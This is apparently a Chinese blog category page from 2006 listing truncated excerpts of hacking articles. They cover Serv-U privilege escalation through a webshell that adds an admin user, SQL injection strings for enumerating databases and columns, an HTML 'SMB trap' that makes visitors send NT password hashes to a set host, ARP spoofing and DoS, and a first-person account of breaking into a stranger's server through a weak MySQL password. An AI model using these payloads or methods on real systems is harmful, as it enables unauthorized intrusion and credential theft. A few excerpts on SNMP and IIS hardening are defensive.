网络安全技术
文章平均质量分 57
meiyouhuiyi
这个作者很懒,什么都没留下…
展开
-
Serv-U得到管理员密码新招
有时候我们在获得WebShell后很高兴地用Serv-U的本地权限提升漏洞来实现完全控制肉鸡的目的,但总会出错。我们在WebShell输入的命令一般是这样的: D:/WEB/su.exe "net user 1 1 /add"很多情况下不能成功,一般会返回如下的信息: >USER LocalAdministrator >PASS #l@$ak#.lk;0@P 这样的情况是因为管理员修改了默认的Se转载 2006-09-08 16:34:00 · 2615 阅读 · 0 评论 -
注入的几条简单语句
一、版本url/1.asp?id=1 and @@VERSION>0二、跨库url/1.asp?id=1 and 1=(select db_name(n))n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?三、列名url/1.asp?id=1 and 1=(select col_name(object_id(表名),n) 表名可以换成16进制。像bbsuser=0x6200620转载 2006-08-05 15:08:00 · 818 阅读 · 0 评论 -
如何为windows2000创建一个tftp service
Windwos 2000在默认情况下TFTP服务是没有安装的,只有在使用RIS服务的时候才会安装该服务(使用RIS服务的人很少),现在我给大家示范如何来安装一个tftp服务(如果你有需要的话)。我们首先找到系统中的tftpd.exe文件,一般我们可以在%systemroot%/system32/dllcache目录下找到该文 件(Windows 2000 Server中文版),建议把该文件cop转载 2006-07-21 15:19:00 · 1076 阅读 · 0 评论 -
arp欺骗成功实例
今天晚上抓鸡,偶遇一台2000的机器,习惯性的ping了下,让我很兴奋ping值只有13,这么快的肉鸡,不把它搞定了很难受,scan下21 80,3306 5900 端口开放,汗先扫下口令,欣喜若狂,这个管理员够弱智的,mysql口令居然是root root ,本地连上去.返回banner信息是mysql4.0的,呵呵传个MY_UDF进行提权,很快就搞定这台机器.大家知道现在很多主机都是拖管在机原创 2006-07-19 21:10:00 · 2271 阅读 · 0 评论 -
基于SNMP的信息刺探扫描与防护策略
很多人开始明白对于WIN2K来说,关闭了TCP139和445端口以后,安全性会提高很多,起码很多对系统信息的刺探扫描也无法进行了。一般来说,的确是这样。但要做到真正完善的安全,还需要从每一个细节去考虑是否会存在隐患。比如,对于完全安装的WIN2K或者说启动了 简单网络管理协议(SNMP)的系统来说,仍然将存在非常致命的隐患,完全将你的系统暴露给所有人。 一、从SNMP说起转载 2006-07-14 00:57:00 · 730 阅读 · 0 评论 -
SMB陷阱网页截取NT密码散列
Flash file://192.168.0.2/A.JPG" height=1 width=1 >陷阱页面关键句子file://192.168.0.2/A.JPG" height=1 width=1 >转载 2006-07-14 00:42:00 · 783 阅读 · 0 评论 -
ASP木马提升权限的N种方法
ASP木马提升权限的N种方法Submitted by cooldiyer on 2006, July 6, 11:53 AM. 技术一、Serv-U提权 OK,看看他的PROGRAME里面有些什么程序,哦,有SERV-U,记得有次看到SERV-U有默认的用户名和密码,但是监听的端口是43958,而且是只有本地才能访问的,但是我们有端口转发工具的啊,不怕。先看看他的SERV-U的版本是多少,t转载 2006-07-19 20:08:00 · 2802 阅读 · 0 评论 -
arp协议分析
ARP地址解析协议详解及其漏洞分析/* * 以太网解释协议(ARP). 文件名:/sys/netinet/if_ether.c * 注释:xie_minix *一,函数入口: * ARP有两个入口:1 * 由ether_input发出一软中断(见我的ethernet网络代码详解一文),arpintr中断例程被调用,检查完数据后 * 该中断例程调用in_arpinput函数. * 入口2: *原创 2006-07-08 03:35:00 · 2941 阅读 · 2 评论 -
Html标签带来的安全隐患
WWW服务是因特网上最重要的服务之一,提供给客户各种各样的信息资源,而把这种信息资源组织起来的一个很重要的东西就是Html超文本语言,然后经过应用的发展就出现了其他的如UBB等标签但是最终都是以Html代码来实现的。经过研究发现,即使是最安全的安全代码(已经排除了通常所说的Xss漏洞)也无法避免另外一种恼人的攻击方式,配合不严格的程序,可能被人利用产生更大的威胁。我们就以现在广泛存在于论坛,文章系转载 2006-07-08 02:29:00 · 1471 阅读 · 0 评论 -
端口映射全集
端口映射原理内网的一台电脑要上因特网,就需要端口映射 端口映射分为动态和静态 动态端口映射: 内网中的一台电脑要访问新浪网,会向NAT网关发送数据包,包头中包括对方(就是新浪网)IP、端口和本机IP、端口,NAT网关会把本机IP、端口替换成自己的公网IP、一个未使用的端口,并且会记下这个映射关系,为以后转发数据包使用。然后再把数据发给新浪网,新浪网收到数据后做出反应,发送数据到NAT网关的那个未使转载 2006-06-22 13:44:00 · 1435 阅读 · 0 评论 -
Serv-U配置详解
SERV-U的目录文件结构说明Servudaemon.exe serv-u的服务程序,主文件Servudaemon.ini serv-u的配置文件,记录用户信息,服务器参数Seruadmin.exe serv-u管理界面Servuadmin.ini serv-u管理界面配置文件Servutray.exe serv-u系统托转载 2006-10-25 14:50:00 · 1927 阅读 · 0 评论 -
将本地硬盘映射到3389肉鸡
每次与肉鸡之间传东西 都特烦人~想了哈有没有什么变通的方法直接与肉鸡进行文件交换~这样也很省事~刚好今天晚上与UU在咖啡厅闲坐 谈及此问题。UU也说就是每次用FTP太委琐了~提到了这个方法,还没试验~回到家后,呵呵小试成功把方法贴出共享了cmd-mstsc-本地资源-本地设备-磁盘驱动器OK,连接下~爽 成功了!原创 2006-10-25 00:38:00 · 1702 阅读 · 0 评论 -
几个好的exploit代码站点
http://packetstormsecurity.nl/http://hack.com.ru/http://www.hackcoza.tk/http://www.web-hack.ru/http://www.securiteam.com/http://www.security.nnov.ru/http://www.hackerzhell.co.uk/indexmain.phphttp://ha原创 2006-05-22 22:41:00 · 884 阅读 · 0 评论 -
基于ARP欺骗的TCP伪连接D.o.S
从某种意义上说,如果能够制造TCP伪连接,那么D.o.S也就比较容易实现了。以前LionD8就曾经用这个思路做出了一个新型D.o.S,而今天,我用的也是这个思路。但是,如果直接伪造TCP三次握手而不作其他任何处理,那却是不行的。因为,当攻击的目标主机接收到我们发过去的伪造的SYN包后会发回一个SYN+ACK包(也就是第二次握手)。而当我们的系统收到这个SYN+ACK包后,由于系统内并没有发起真正的转载 2006-05-17 13:40:00 · 879 阅读 · 0 评论 -
Windows Server2003 防木马权限设置IIS服务器安全配置整理
参考了网络上很多关于WIN2003的安全设置以及自己动手做了一些实践,综合了这些安全设置文章整理而成,希望对大家有所帮助,另外里面有不足之处还请大家多多指点,然后给补上,谢谢!一、系统的安装 1、按照Windows2003安装光盘的提示安装,默认情况下2003没有把IIS6.0安装在系统里面。2、IIS6.0的安装 开始菜单—>控制面板—>添加或删除程序—>添加/删除Windows组件 应转载 2006-09-20 01:10:00 · 985 阅读 · 0 评论